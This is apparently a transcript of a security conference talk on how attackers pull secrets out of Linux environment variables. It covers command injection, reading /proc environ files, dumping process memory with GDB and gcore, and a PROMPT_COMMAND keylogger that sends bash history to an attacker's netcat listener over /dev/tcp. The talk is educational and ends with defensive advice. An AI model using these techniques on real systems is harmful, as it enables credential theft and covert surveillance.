The hackers guide to environmental catastrophe

thank you thank you all right so it's a 30-minute talk lightning talk so we're gonna do this lightning fast so my name is Mark Baggett um instructor for Sans I'm the author of a couple of different Sans courses 573 which is uh automating information security with python 673 which is Advanced 573 and then I'm the co-author of a course that's going to be coming out sometime next year on an introduction to Linux security I'm going to show you some of that um one thing that I'm I'm kind of think is kind of cool is my name appears in the source code for Metasploit seven times even though I've never written a module for metasplay just other people

have written the plugins and things for ttps and things that I've developed which and then given me credit for it in the source code because the information security Community is awesome in that way so um what I wanted to talk to you today about actually I came up because of this tweet right so somebody tweeted on the internet I'd like to thank whoever decided it was cool to show secrets and passwords and tokens and stuff into environment variables and make attacking stuff so much easier and the truth is that you know particularly as we move to the cloud right we're getting more and more stuff put into environment variables right um here's you know AWS

you're setting your access Keys secret keys this is some code from Django a python web framework and just look at some of the all of this OS Environ get is it pulling environment variables and it's looking for API secrets and debug mode and allowed host and the app database the database engine and the database name and the database username and the database password in the database right lots and lots of information that's stored in environment variables that if attackers can get to that it's really useful and so I was doing some research working on some stuff and I saw that tweet that was out there I just saw up there showed you a minute ago whoever it and and I posted a

question on Twitter I'm like yeah that's that's cool but how are you getting these environment variables because well the scenario I was looking at it was actually kind of difficult to get to some of the environment variables and of course the obvious answer from everyone on Twitter is you type set or you type e and V Mark what's your problem how do you not know how to get environment variables so uh this this entire presentation is actually just um my response to that and trying to say no I'm not really just an idiot there is these circumstances where environment variables aren't that easily accessible and um well let's take a look at some of those and and then we can decide I'm

going to redeem myself here so I'm going to start out with this with a bit of a demo I'm actually demoing something that comes from one of the new courses I mentioned which is the 406 class and so this is actually going to be one of the labs that is in 406 where we talk about oh that's not it where we talk about environment variables did it go away again how did it go away again okay unplug repeat you there we go all right environment variables can I go full screen it stayed look look at that how about that all right all right so I'm gonna I I should have done this ahead of time so um kind of the idea

with four or six which is the introduction to Linux is I I we would love to have a class where we don't need an instructor that we can just turn you loose on Hands-On labs and let you learn through experimentation and doing um things so you'll see at the bottom I'm getting these prompts asking me to do certain things I'm gonna I'm kind of gonna kind of skip forward to what it is that I wanted to show you and as much as I can I'll make everything as CTF right so hey Echo and display the variable name used to store your path to your home directory so what what variable am I looking for here

dollar home okay it's an introduction to Linux okay um let's see what's next variable that contains the list of directories that Linux searches through for commands you are trying to run Echo dollar path all right and then I think next is what I really wanted to get to okay so let's go ahead and create some variables here I'm going to go ahead and create the variable myvar M my v a r equals 10. foreign and this creates that environment variable and now to retrieve that environment variable I can Echo dollar myvar and it will show me the contents of the variable that I just created so now it's going to tell me hey there's a couple of

different ways you can view environment variables that you've already got created I can type e and V is one of the one of those ways and this displays well the environment variables that are export it tells me it's hard to find let's grep for it so let's type that and type grep myvar right there I can see that my VAR does not appear in EnV so just creating an environment variable it doesn't appear in EnV now where it does appear is what it's going to have us look at next is that's if we type set right so we change that to set I can see all right my bar is shown there so the difference between the two

is is whether or not the variable is exported so when you export a variable that'll an environment variable that allows sub processes to see those environment variables and right now I don't have this thing um set so what is it going to tell me to do uh oh so this is going to tell me to open up a new shell so bash and then when I get in there try and Echo myvar and you'll see that in this sub process right the sub process doesn't have access to that environment variable and I can check EnV with that grep command again and it's again it's not there but if I go back to my parent shell

and then I export my VAR then magically now everything should be able to see that so now if I look at e and V I can see that the variable does show up in EnV and if I go into a nub another sub process such as bash I can now Echo dollar myvar okay and it appears there okay so you have to export the variables for child processes to see those types of variables okay so local variable unexported versus exported okay and I just demoed these three slides so when a variable is not exported it can only be seen by well if you open up a bash prompt and you set an environment variable you can see it in that bash

problem right none of the child processors can see it but when it's exported all the child processes can see it and the process can itself so how does this affect different exploitation scenarios so let's look at the first scenario which is the one that everybody on Twitter was talking about which is where I've created all these environment variables and then my web server is accessing them and then makes them um uh makes makes them well they're in memory inside of my web server so to demo this I'm going to come over here I'm going to use a web server I got a tool that I've written called API fi which oh actually let me let me first do

this let me create an environment variable so I'm going to create a variable called Cloud API secrets and I'm going to export it and then I'm going to start my web server called API fi now this has got a code injection vulnerability in it but it's actually a configuration option you can say do you want to be vulnerable to code injection or not and I've chosen to say yes I do want to be vulnerable to code injection so with this one what it's going to do is actually run ping it's going to run this Command right here plus whatever command line argument I pass to it on the thing and the idea of API fi is I

just want to jsonify the entire world so if you have any Linux command that you would like to be able to integrate into some type of an event management platform right you can just run this and it'll cache the entries and it does about 60 000 requests a second is what we saw something something like that it's pretty fast okay so but what because I've enabled command line injection I can do things like this I can ask it to Ping google.com and then well also semicolon student or who am I so I've got a code injection vulnerability and with that I can put whatever command I want to after this semicolon so I can do things like hey let's

Echo dollar sign what was the variable that I created over here called Cloud API secrets so let's Echo oh this is going to need to be a space here so that's I'll put a percent 20 here and then cloud API secrets and no secret did I do yeah there you go and so there I've got my top secret data that I could um see there now there's actually another variable in here that I want to come back to and just show you in a minute let me just show you that I can also get to this other variable that's here called uh more Secret okay right so this and uh oh darn it it's a

spoiler alert I created this one um setting it after the um process actually launches okay so I can and actually you can run anything right I could just run set here if I wanted to and get back a list of well all the environment variables through this command injection okay so yes if you have environment variables with sensitive data inside those and those things are loaded in memory and a web process the web process has access to those environment variables then if you've got a command injection vulnerability they can pull all those things if you've got Amazon Keys whatever database names passwords if there's a command injection vulnerability right bad things are going to happen so what's the the trick don't

have command injection vulnerabilities right that's bad but what about the scenario that I was actually talking about um when I was when I asked the foolish question of well how do you get these things out of the process memory and that is let's say that the attacker gets onto the web server right I've got my web server and all this stuff's loaded in memory but I get in Via either an exploit that's on the system or by guessing an SSH username or an FTP username get on the systems where I've got shell running on the same system as well the web server how do I get to the stuff that's in memory in that server and it turns out

that well it kind of depends right so one thing that some things that you can do to make it a little bit more difficult for attackers that are in that scenario where they're on the same system and I'm just trying to grab something that's stored in a service configuration or something is well you can um make it so that the variables are only inside of the child process and not inside the parent process that launched it so for example you know if you if you um are at the command line if you want to just set an environment variable inside of a child process but not have it be available in your own process you

can set the environment variable just space and then the other command you're going to run now and here I'm setting a variable called myvar2 Equals blah and then I run a bash prompt that's trying to Echo myvar and you can see that oh it does have access to it in that bash prompt but here in the back in the parent process the thing that launched that child process my variable brought the variable is not there so it was only available in the child process not in the parent process so that's one thing I could do of course if I if um here what's a great way to grab this thing if uh if this is what I did in order to set

that environment variable the history Command right I can just go into the history right so anything you type there is obviously going to show up in the history well one thing you can do um to make it so that your sensitive environment variables that you don't want um everybody to have aren't recording any history it's by default on most bash on most systems bash is configured so if you just put a space before a command that it's not going to be recorded in history so space export API key and now well it doesn't show up in my history of course whether or not that works depends upon an environment variable right so you've got this environment variable

called his control that says hey here's my options ignore space is one of the options ignore both is I'm going to ignore both space and duplicates so if it's this or this then I can just use the space to not to not record my environment variables all right so let's let's say that we do all of those things I'm on the same system as the web server what's a great way to uh grab the information that's on there also well I first place I went to is the proc folder right we have on our Linux system because when a process launches the operating system does it so let's let's try that um so over here I've got my web

server let's see um let's figure out what my process ID number is all right so my API fi is running here under process number 7681 so let's CD into proc slash p r o c 7681 and in there I'll have a folder called environs okay and then in environments I'm going to cat environs [Music] a-n-v-e-n-v-i-r and I'm gonna just grab for uh API or let's just grab for secret okay oh grab minus a secret all right and so there you can see my cloud API secret shows up there right but one thing didn't show up there and that was what was the other variable that I asked for here it was more secret right more

secret was available here when um when I used it through a command injection I was actually able to see the value that was in the more secret so here I can see that value there but over here in proc environs it's not there does anybody know why it's not there because the kernel sets that at launch right the environment variables inside of proc are recorded when the process launches which means that if in my scripts I set all my environment variables and then I launch my web server those will show up in proc but if the process was to set its own environment variables or to do other things to have its information stored that's not going to be set in proc so

that's well maybe I could have my my process create environment variables to have its configuration so that gets into a well maybe then I have to feed it to configuration well actually the point here is that actually configuration files I think are more secure from this standpoint than environment variables but now your configuration files are also in clear text that are on the machine so that now I'm just looking for config duration files to get that so I'll I'll get into some of that but there you go so so my question was okay I'm I'm in a situation where I actually want to get the keys that are in memory on this process um that were set after the process launched

how can I do that and it's turned out to be well a a fun afternoon of coding because it turns out that um well it's it's not as easy as you want I did write a process and this is a this is on my um it's actually on a gist right gist.github.com I wrote this little process called well dump environment variables that given a process ID what was my process ID number 7681 right so I can sudo process 7681 and what it's going to do is actually uh use GDB to hook the process then go through the the data structures that are in GDB pull out all the environment variables and so yeah I can still get to them

but well I I have to be able to dump memory on the system so I'm like all right awesome I wrote this little program I went to the system I'm like let's dump the memory and it doesn't work like wait a minute why can't I dump the memory it work works on my system right that's what we say as developers when we write code and then but then okay but turns out I was actually the customer in this case who was trying to use the code on another system so I had to figure it out I couldn't just say it works on my system so why did it work on my system and not on the other system Well turns out that

there's some some Linux kernel configurations that can prevent this and I don't know where I am in my slides now all right so demo and proc just did stealing variables right uh yep I did have time for that so who can steal stuff from memory well it actually depends um so um root can steal anybody's stuff from memory so if if the if if the attacker has root on your system as we all can um imagine game over right they can get um those but you know they've got everything that they need at that point but what about where I was right if I if I pop the account for the Apache process the service account and I'm on there as

another Apache process can I dump the memory from another Apache process and the answer is well no you can't in most circumstances actually there's a setting in this config P Trace config which prevents you from dumping memory into in other sibling processes so if I was in an Apache web service account that was like the child process of the web server then I could get to those things but if I'm in if I'm just on the system as another Apache process then I actually can't dump the memory from those processes and it is a memory dump so this doesn't just apply to environment variables this would apply to configuration or just any sensitive data that's kept in there if you're a sibling

process then you cannot do this so awesome I'm just going to go in there and I'm going to change the setting inside of P trace and oh who can change that root right root and it's going to require a reboot of the system afterwards so so this is actually kept me out from from getting those environment variables so there's that okay so the answer is just stick everything into config files right yeah except people put config files on their system and then they forget about them and they post them to GitHub right so here go to Google DB user file type EnV these EnV extensions are where where people will set environment variables in all kinds of Frameworks and then it

loads those things up into memory so um yeah so these don't look like templates these look like legit uh usernames and passwords that are coming back um to me okay um so there's that the other thing I wanted to mention about environment variables is environment variables are also really useful to an attacker from an offensive standpoint I don't know if if you've been looking at some of the interesting back doors that have been developed over the last year or two but there's this thing called the Symbiote backdoor in Linux and it's actually using this environment variable called LD preload right where um you know by default Linux processes they they can they can either load system libraries on their own or if

they're configured to they can just use the the libraries from their parents and actually the default is to loot if my parent process already has this Library loaded then I'm not going to load it up myself right I'm just going to use the one that my parent process did but you can change that and you can say hey even if your parent process has it then I want you to load it and by the way here's a path for that file so you can it's basically like dll side loading on Linux or on Windows but it's the roughly the Linux equivalent of that so there's some privileged escalation exploits and here I've got some um some links that

you can go back and watch the slides and pull out these links but there's some cool privilege escalation exploits that you can use with LD preloading and there's some uh some back doors that are have some interesting and here's another fun one this one is kind of fun I thought I'd just show this to you here how about an environment variable that creates a creates a key logger so let me see I think I have on my desktop the ability to demonstrate this to you let's see LS uh yeah well it's cat EnV keylogger here so and then um I'm gonna over here on this window I'm gonna put a little while loop it's going to be a netcat listener okay so

let's just do that here so here's this is going to be my attacker here on the internet uh this is my attacker paste all right so he's got his little net cat listener running over here and then I'm here on my Victim I'm just going to set the prompt command environment variable so what does the prompt command do well prompt command is going to run every time a prompt appears and what am I telling my prompt command um to do here I'm gonna say all right anytime you make the prompt appear I want you to run the command history Dash a which says take anything any command history that you've got in memory and commit it to the file that's on the

system then I'm gonna say all right now take the last line out of that file The Bash history on that system and then just write it to slash Dev TCP the IP address of the attacker Port 9000 where I've got my little netcat listener running so here by just creating this environment variable now if I type LS ID who am I whoops who uh who am I right back over here in attacker land right it's a key logger right we're not getting the output but it's a key logger not an output logger right so with just an environment variable right we can do things like creating it in environment variables and since um we also talked about dumping

memory I thought this would be a good opportunity to to just throw out this this uh this other thing I tweeted about um which was um you know is anybody not using GitHub these days it's another thing that you know cloud cloud use has exploded everybody's using GitHub to configuration anybody using git credentials to just uh you know what I'm tired of typing that password all the time yeah so if an attacker can dump your memory and a good process to dump memory um is if your root of course is is g-core where you can just say hey in record in this file all of the memory from this process ID and then you just

run strings on it so here I'm just going through that memory dump and looking for user slash or password and here you can see my username or password there so this is another thing relating back to what we taught who can dump that memory well root don't let people get root on your system and parent processes of the same user ID and that's who can dump that memory and that is what I've got for you and 30 we've got five minutes left so I can take questions my points here are these there's a lot of sensitive data in your environment variables don't put stuff there that you that you really care about and do what you can to lock

your systems down there are some things you can do like make sure it's not in your history and things like that if possible have all of that sensitive data load into memory afterwards then it won't be recorded in proc and then it's just a matter of protecting memory through good privilege uh through good Rights Management okay any questions because I'm standing between you and lunch what you got

could I use P Trace to defend against that and p-trace myself

um I don't know I don't know I'd have to I'd have to I'd have to experiment with that so I'm not I'm not quite sure but that's a great question would you like the red team field manual or would you like a war collar War collar okay here's a broken work I'll learn let's Charlie catches it okay uh question um I don't have the slides for download but they'll be out on a YouTube there'll be a YouTube video on it yep other questions what you got

wood SE Linux protect against a sibling process even a sibling process doing it um I there there are so many management and configuration changes that that are in SC Linux I imagine that there's probably something that you could use to protect against that with SC Linux but but I I can't give you the definitive answer on that but with that maybe maybe the answer to your question is in the red team Field Manual um and so there you go all right so for lunch you should have blue tickets right